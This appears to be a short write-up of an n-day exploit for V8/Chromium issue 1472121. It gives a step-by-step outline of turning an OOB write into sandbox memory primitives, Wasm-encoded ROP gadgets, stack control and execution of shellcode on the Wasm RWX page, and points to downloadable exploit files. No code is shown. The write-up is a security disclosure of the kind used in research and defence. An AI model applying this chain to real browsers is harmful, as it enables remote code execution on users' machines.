Vulnerability

This is an n-day exploit based on chromium issue 1472121, which still has its report closed. I found it by looking through the v8 commit history (https://github.com/v8/v8/commit/10b0e62e7059a29e4c23b3e041c5da87983f22bc). The commit also has a regression test that I was able to use to trigger the vulnerability and achieve an OOB write.

Exploit

The steps for the exploit are:

1. Use the vulnerability to modify v8 heap objects to achieve read, write, and addr_of primitives within the sandbox
2. Load WebAssembly with useful gadgets for ROP (done by using mov instructions with constants that are encoded instructions) that we can leak the addresses for from the WasmInstance object
3. Create a byte array with the final x86 payload to run
4. Create and modify v8 bytecode to take control of rsp/rbp
5. Use our controlled stack to ROP and copy the byte array to the Wasm rwx page and execute

The only address that I needed to leak was the wasm rwx page, which has a 64 bit pointer inside the sandbox

Attached files

The entire exploit is written in 1472121_min.js, and is called by 1472121.html with some useful helper functions. Other files are included to help with testing:

• test.wat: the WebAssembly code to generate ROP gadgets
• test.wasm: compiled WebAssembly used in exploit
• server.py: useful for running https

Download exploit.tag.gz containing the above mentioned files.